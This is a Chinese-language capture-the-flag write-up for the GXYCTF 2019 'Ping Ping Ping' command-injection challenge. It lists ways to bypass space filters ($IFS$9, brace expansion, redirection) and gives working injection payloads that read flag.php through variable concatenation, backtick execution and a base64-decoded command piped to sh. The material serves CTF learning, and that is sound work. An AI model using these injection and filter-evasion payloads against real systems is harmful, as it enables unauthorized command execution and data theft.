GXYCTF 2019 | 题目解析之Ping Ping Ping – 作者:无名草talent

Ping Ping Ping

进入题目图片[1]-GXYCTF 2019 | 题目解析之Ping Ping Ping – 作者:无名草talent-安全小百科

肯定先Ping一下本地IP:127.0.0.1
图片[2]-GXYCTF 2019 | 题目解析之Ping Ping Ping – 作者:无名草talent-安全小百科能连接上

然后用**ls**关键字列出当前目录的内容

1621431914_60a5166ab09adfcf9393c.png!small?1621431914356接着我们肯定想查看flag.php里面的值
用**cat**命令查看文件内容,
还有其他查看命令主要是tac,head,more,tail,less
图片[4]-GXYCTF 2019 | 题目解析之Ping Ping Ping – 作者:无名草talent-安全小百科显示空格被过滤了;
一般空格过滤绕过的方法:

{cat,flag};   ${IFS$;   $IFS$9;   <;   <>;

经过测试用空格用**$IFS$9**绕过;
然后变量**拼接,倒序**得到payload:

?ip=127.0.0.1;a=ag;b=fl;cat$IFS$1$b$a.php
也可以?ip=127.0.0.1;a=lag;cat$IFS$9f$a.php

1621432029_60a516ddb83e9343a6f5d.png!small?1621432029374

解法2:

内联执行绕过
将**反引号内**命令的输出作为输入执行

?ip=|cat$IFS$9`ls`

解法3:

虽然过滤了bash,但没过滤sh,可以使用下面的方法:

ip=1;echo$IFS$9Y2F0IGZsYWcucGhw|base64$IFS$9-d|sh

推荐写的***很好***的关于此类题目的文章

https://www.codenong.com/cs105422347/

来源:freebuf.com 2021-05-19 21:58:29 by: 无名草talent

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论